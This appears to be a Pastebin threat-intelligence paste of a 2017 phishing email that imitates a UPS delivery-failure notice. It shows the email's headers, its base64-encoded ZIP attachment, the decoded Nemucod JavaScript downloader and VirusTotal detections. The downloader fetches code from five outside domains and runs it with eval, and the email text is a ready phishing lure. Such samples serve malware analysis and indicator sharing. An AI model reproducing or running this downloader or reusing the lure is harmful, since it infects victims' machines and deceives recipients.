Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Received: from exim by mail3.eqx.gridhost.co.uk with spam-scanned (Exim 4.63)
- (envelope-from <presta@www.e-conrad.iq.pl>)
- id 1cjhM2-0008LB-OV
- for info@haymarketdental.com; Fri, 03 Mar 2017 07:10:23 +0000
- X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
- spam-10-168-100-9.eqx.gridhost.co.uk
- X-Spam-Level: **
- X-Spam-Status: No, score=2.7 required=4.0 tests=BAYES_50,RCVD_IN_BRBL_LASTEXT,
- RDNS_NONE autolearn=no version=3.3.1
- X-Spam-RelaysUntrusted: [ ip=46.248.165.161 rdns= helo=www.e-conrad.iq.pl
- by=mail3.eqx.gridhost.co.uk ident= envfrom=presta@www.e-conrad.iq.pl intl=0
- id=1cjhM2-0008Jw-MY auth= msa=0 ]
- Received: from [46.248.165.161] (helo=www.e-conrad.iq.pl)
- by mail3.eqx.gridhost.co.uk with esmtps (TLSv1:AES256-SHA:256)
- (Exim 4.63)
- (envelope-from <presta@www.e-conrad.iq.pl>)
- id 1cjhM2-0008Jw-MY
- for info@haymarketdental.com; Fri, 03 Mar 2017 07:10:18 +0000
- Received: from presta by www.e-conrad.iq.pl with local (Exim 4.80.1)
- (envelope-from <presta@www.e-conrad.iq.pl>)
- id 1cjhM1-0006mu-Mc
- for info@haymarketdental.com; Fri, 03 Mar 2017 08:10:17 +0100
- To: info@haymarketdental.com
- Subject: We have delivery problems with your parcel #004264707
- X-PHP-Originating-Script: 1008:post.php(3) : regexp code(1) : eval()'d code(17) : eval()'d code
- Date: Fri, 3 Mar 2017 08:10:17 +0100
- Content-Type: multipart/mixed;
- boundary="bound1_9f49d9393cb5a33697a5f25c631fad12"
- Content-Transfer-Encoding: 8bit
- Message-Id: <E1cjhM1-0006mu-Mc@www.e-conrad.iq.pl>
- From: presta@www.e-conrad.iq.pl
- --bound1_9f49d9393cb5a33697a5f25c631fad12
- Content-Type: text/plain; charset=us-ascii
- Dear Customer,
- Your item has arrived at the UPS Post Office at March 01, but the courier was unable to deliver parcel to you.
- Please review delivery label in attachment!
- Most sincerely,
- Keith Levy,
- UPS Delivery Agent.
- --bound1_9f49d9393cb5a33697a5f25c631fad12
- Content-Type: application/zip; name="UPS-Delivery-004264707.zip"
- Content-Transfer-Encoding: base64
- Content-Disposition: attachment; filename=UPS-Delivery-004264707.zip
- UEsDBBQAAAAIAEhBY0rkUACwqgIAAM4CAAAeAAAAVVBTLURlbGl2ZXJ5LTAwNDI2NDcwNy5kb2Mu
- emlwC/BmZhFhYGDgYPBwTPa6nGWx34iJgSGTmYFBFigaGhCs65Kak1mWWlSpa2BgYmRmYm5grpeS
- n6yXVRwaHJs/20CkNu3Sv+an7WIuzpO3eE9LvXtl/dbZYlvn3phl2qvWHsO00nBlLkfm1P/7soOt
- fB8lFZ9/WFBS28Et+NJEXIU59MWdryc2f/7WK/x80g7VySq2WfyevzZyWXS0+hW8/y0npHPasOfT
- m+gypz6PP4ueVJ1nK1J54cSllODbJ6iRWGMa7bTkrut1aalj19aGKzNpJLRuSK6Kyjvz6c2N8xFd
- KVmmwmtW96l92feqduE/rbdnj16+0mVhUKnqw7a28f48v9gqx9qu65ZhHt877FTsFsqvWO94a5Xa
- yyt5GS1TZFYfEIq4cee/z98c/bSYxu+feh0aZ0Tf/p+zsJhDZUWonkhLwEs23+RHp6bvnOifYiDx
- Q3bTZueUCV2WIeEbZ1feyC+18V6/vC25+or09/qjDmsrVk2U0/kcsmN3zvXqrw/OqGxov3V/27zV
- O1193Du5w25pRZ+5s+2Z6+Oai66vS5as6ilv/vjid6pE3OXE3lQ2rvzrz9+/98sTstM4Zm/tqd9z
- 42nkRXvLf8Fhe58Y5H3lf3Ldzy5t9e77Tx3XV8jE2sduOX7S947V2l/7f9w96LHlWuISuXX51fbH
- tk9f7LbfqXY2j+bNY0u9E5wa0qTnnf4Zwxo472HhxdJJxQE9zpOyH6zyMN2TZKMfvLHjY2vJuQop
- Z2Ydyw0S/KfeGJbOjlwYxOjFmqr2yXTTipmxk8OCzlvP05dwm+9wsuKvgcrtW1ptbOkTM/Zmnbm+
- 0/ju71X3j+nsO2yVH+DT1/htpe3CZ9ul/rEGeDMCExfu5AYBClAab+IL8GZlAyliBEJvIJ3LBOIB
- AFBLAQIAABQAAAAIAEhBY0rkUACwqgIAAM4CAAAeAAAAAAAAAAAAIAAAAAAAAABVUFMtRGVsaXZl
- cnktMDA0MjY0NzA3LmRvYy56aXBQSwUGAAAAAAEAAQBMAAAA5gIAAAAA
- --bound1_9f49d9393cb5a33697a5f25c631fad12--
- function mesuto() {
- for (var i=0; i<x.length; i++)
- {
- var vDJmB = function(){
- return new ActiveXObject(g2);
- }();
- var e = vDJmB;
- try
- {
- var raspbna2s=["\x6F"+pi6dnz];
- e[raspbna2s[9-9+0]]("G"+""+"E"+"T", t4 + ":"+ter+ter+x[i]+ter+"c"+"o"+"u"+"n"+"ter/?"+m,false);
- e.send();
- var r = e.responseText;
- if (r.length > 999+1 && r.indexOf(m) > -1)
- {
- reqty(e.responseText.split(m).join('a'));
- break;
- };
- }
- catch(e)
- {
- };
- };
- }
- var g2 = "Msxml2.XMLHTTP";
- var m = "TWwE8ZBQhl9uXU1h6TcaHDu7BA_vx6h4f-73rI1oXapZYv36uqMPzG0XhQf-Cx7VlZ3Mn-wTcskPW6RXWHM";
- var x = new Array("jeannetaylordds.com", "wholesalehotelsuites.com", "lovingfloridalife.com", "jleaf.se", "iveybusiness.vmnow.co");
- function reqty(fdga) { eval(fdga); }
- var t4 = "http";
- var pi6dnz = "\x70\x65\x6E";
- var ter = "/";
- mesuto();
- https://www.virustotal.com/en/file/ff92c175370564f97f81c6265882bdbccd5134af1890bc03181700d4a1661b10/analysis/1488824666/
- File identification
- MD5 ec699c50bd7aefcdd86cbd955f001985
- SHA1 5dc9fcd6b739835f226018b506d0647a93d83482
- SHA256 ff92c175370564f97f81c6265882bdbccd5134af1890bc03181700d4a1661b10
- ssdeep
- File size 840 bytes ( 840 bytes )
- File type unknown
- Magic literal
- TrID
- VirusTotal metadata
- First submission 2017-03-06 18:24:26 UTC ( 0 minutes ago )
- Last submission 2017-03-06 18:24:26 UTC ( 0 minutes ago )
- File names UPS-Delivery-004264707.zip
- Contained files
- This file is a compressed stream containing 1 file.
- [+] UPS-Delivery-004264707.doc.zip ZIP 718 Bytes
- Compression metadata
- Contained files1
- Uncompressed size718
- Highest datetime2017-03-03 08:10:16
- Lowest datetime2017-03-03 08:10:16
- Contained files by extension
- zip1
- Contained files by type
- ZIP1
- ExifTool file metadata
- MIMETypeapplication/zip
- ZipRequiredVersion20
- ZipCRC0xb00050e4
- FileTypeZIP
- ZipCompressionDeflated
- ZipUncompressedSize718
- ZipCompressedSize682
- FileTypeExtensionzip
- ZipFileNameUPS-Delivery-004264707.doc.zip
- ZipBitFlag0
- ZipModifyDate2017:03:03 08:10:08
- Microsoft TrojanDownloader:JS/Nemucod.ZZZ 20170306
- NANO-Antivirus Trojan.Script.Nemucod.embvil 20170306
- Kaspersky Trojan-Downloader.JS.Agent.nrs 20170306
- ZoneAlarm by Check Point Trojan-Downloader.JS.Agent.nrs 20170306
- K7AntiVirus Trojan ( 004dfe6d1 ) 20170306
- K7GW Trojan ( 004dfe6d1 ) 20170306
- TrendMicro TROJ_NEMUZIP.SMA1 20170306
- TrendMicro-HouseCall TROJ_NEMUZIP.SMA1 20170306
- Sophos Mal/DrodZp-A 20170306
- Emsisoft JS:Trojan.JS.Agent.PLM (B) 20170306
- ALYac JS:Trojan.JS.Agent.PLM 20170306
- Ad-Aware JS:Trojan.JS.Agent.PLM 20170306
- Arcabit JS:Trojan.JS.Agent.PLM 20170306
- BitDefender JS:Trojan.JS.Agent.PLM 20170306
- F-Secure JS:Trojan.JS.Agent.PLM 20170306
- GData JS:Trojan.JS.Agent.PLM 20170306
- eScan JS:Trojan.JS.Agent.PLM 20170306
- ESET-NOD32 JS/TrojanDownloader.Nemucod.CKJ 20170306
- McAfee JS/Nemucod.rj 20170306
- McAfee-GW-Edition JS/Nemucod.rj 20170306
- Fortinet JS/Nemucod.CKJ!tr.dldr 20170306
- AVG JS/Downloader.Agent.70_S 20170306
- Cyren JS/Downldr.HX1!Eldorado 20170306
- F-Prot JS/Downldr.HX1!Eldorado 20170306
- Baidu JS.Trojan-Downloader.Nemucod.ud 20170306
- CAT-QuickHeal JS.Nemucod.CIS 20170306
- DrWeb JS.DownLoader.1225 20170306
- Comodo Heur.Dual.Extensions 20170306
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement